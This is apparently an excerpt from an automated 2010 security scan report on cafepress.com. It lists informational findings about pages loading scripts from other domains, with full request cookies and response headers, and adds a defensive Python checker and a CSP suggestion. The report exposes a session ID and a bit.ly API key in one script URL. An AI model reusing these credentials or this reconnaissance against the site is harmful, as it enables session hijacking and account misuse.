X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 57707
Date: Sun, 26 Dec 2010 13:48:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cp_sc=100156; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:48 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 57707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</div> <script language="javascript" src="http://content1.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.15. http://www.cafepress.com/+clocks
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+clocks
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+clocks HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59318
Date: Sun, 26 Dec 2010 13:48:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cp_sc=100161; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:32 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</div> <script language="javascript" src="http://content3.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.16. http://www.cafepress.com/+coasters
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+coasters
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+coasters HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59255
Date: Sun, 26 Dec 2010 13:48:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cp_sc=100176; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:35 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59255

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
</div> <script language="javascript" src="http://content6.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.17. http://www.cafepress.com/+eat_sleep_game_light_tshirt,299007536
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+eat_sleep_game_light_tshirt,299007536
Issue detail
The response dynamically includes the following scripts from other domains:
http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content2.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js
http://content7.cpcache.com/js/http_request.js
http://partner.googleadservices.com/gampad/google_service.js
http://s7.addthis.com/js/250/addthis_widget.js
Request
GET /+eat_sleep_game_light_tshirt,299007536 HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 93204
Date: Sun, 26 Dec 2010 13:49:11 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cp_sc=100007; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:19:11 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 93204

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/...[SNIP]...
</script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]...
<!-- this one is for ajax stuff --><script type="text/javascript" src="http://content7.cpcache.com/js/http_request.js"> </script>...[SNIP]...
</div><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=cpadmin"> </script>...[SNIP]...
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
</script><script src="http://content2.cpcache.com/widgets/3Dviewer/swf/js/swfobject.js" type="text/javascript"> </script>...[SNIP]...
<!--End TellApart--><script type="text/javascript" charset="utf-8" src="http://bit.ly/javascript-api.js?version=latest&login=cafepress&apiKey=R_db7be8da925f7471c6c3a8533a27198c"> </script>...[SNIP]...
5.18. http://www.cafepress.com/+framed-prints
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+framed-prints
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+framed-prints HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 63735 Date: Sun, 26 Dec 2010 13:48:18 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cp_sc=100169; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:17 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 63735 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
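The check behind this class of finding is simple to reproduce offline against a saved response: collect every script element whose src resolves to a host other than the one that served the page. The block below is an added example, not part of the XSS.CX report and not Burp's own implementation. Its sample HTML is constructed from the script tags visible in the /+framed-prints response above, padded with one same-origin and one relative script so the filter has something to exclude; the csp_script_src helper proposes a Content-Security-Policy allow-list as a mitigation, which is an assumption about what a reviewer would recommend, not a header the scanned site sent.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a trimmed version of the /+framed-prints response in
# this report, plus a same-origin script and a relative script that a
# cross-domain check must NOT flag. Not a live capture.
SAMPLE_PAGE_URL = "http://www.cafepress.com/+framed-prints"
SAMPLE_HTML = """
<html><head>
<script type="text/javascript" src="/js/site.js"></script>
<script type="text/javascript" src="http://www.cafepress.com/js/cart.js"></script>
<script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"></script>
</head><body>
<div></div>
<script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"></script>
<!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'></script>
<script>var inline = 1;</script>
</body></html>
"""


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag, in document order."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        for name, value in attrs:
            if name.lower() == "src" and value:
                self.srcs.append(value.strip())


def script_sources(html, page_url):
    """Return the absolute URL of every external script in the page.

    Relative and protocol-relative src values are resolved against the
    page URL so they compare correctly against the page host.
    """
    collector = _ScriptSrcCollector()
    collector.feed(html)
    return [urljoin(page_url, src) for src in collector.srcs]


def cross_domain_scripts(html, page_url):
    """Return the external scripts whose host differs from the page's host.

    The comparison is an exact hostname match, so a sibling such as
    static.cafepress.com would also be reported; every distinct host that
    can serve script into this origin is a separate trust boundary, and
    the caller can whitelist known-owned hosts afterwards if desired.
    """
    page_host = urlsplit(page_url).hostname
    flagged = []
    for url in script_sources(html, page_url):
        host = urlsplit(url).hostname
        if host and host != page_host:
            flagged.append(url)
    return flagged


def csp_script_src(html, page_url):
    """Build a Content-Security-Policy script-src value allowing only 'self'
    plus the third-party hosts actually observed in the page.

    This is the allow-list a reviewer would propose as a mitigation
    (assumed recommendation); the scanned responses carry no such header.
    """
    hosts = sorted({urlsplit(u).hostname for u in cross_domain_scripts(html, page_url)})
    return "script-src 'self' " + " ".join(hosts)


if __name__ == "__main__":
    for url in cross_domain_scripts(SAMPLE_HTML, SAMPLE_PAGE_URL):
        print("cross-domain script:", url)
    print("Content-Security-Policy:", csp_script_src(SAMPLE_HTML, SAMPLE_PAGE_URL))
```

The finding is rated Information because including a third-party script is a design decision, not a bug, but the consequence is worth stating: each listed host can execute arbitrary JavaScript in the www.cafepress.com origin. Since the Set-Cookie headers in these responses carry neither the HttpOnly nor the Secure attribute, that includes reading ASP.NET_SessionId through document.cookie, so a compromise of any of those CDN or ad hosts is equivalent to stored XSS on every page that includes them.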
5.19. http://www.cafepress.com/+greeting_cards
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+greeting_cards
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
GET /+greeting_cards HTTP/1.1 Host: www.cafepress.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; 
cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;
Response
HTTP/1.1 200 OK Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 CP: LVW28 ntCoent-Length: 59651 Date: Sun, 26 Dec 2010 13:48:50 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cp_sc=100148; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:50 GMT; path=/ Set-Cookie: cppss=3x0; domain=cafepress.com; path=/ Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/ Cache-Control: private Content-Length: 59651 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <meta h...[SNIP]... </script><script type="text/javascript" src="http://content0.cpcache.com/js/hoverIntent.minified.js"> </script>...[SNIP]... </div> <script language="javascript" src="http://content4.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4"> </script>...[SNIP]... <!-- Start Sweepery Offertarget --><script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'> </script>...[SNIP]...
5.20. http://www.cafepress.com/+hats-caps
Summary
Severity: Information
Confidence: Certain
Host: http://www.cafepress.com
Path: /+hats-caps
Issue detail
The response dynamically includes the following scripts from other domains:
http://content0.cpcache.com/js/hoverIntent.minified.js
http://content8.cpcache.com/marketplace/js/randomSearchRelatedFunctions.js?v=4
http://partner.googleadservices.com/gampad/google_service.js
Request
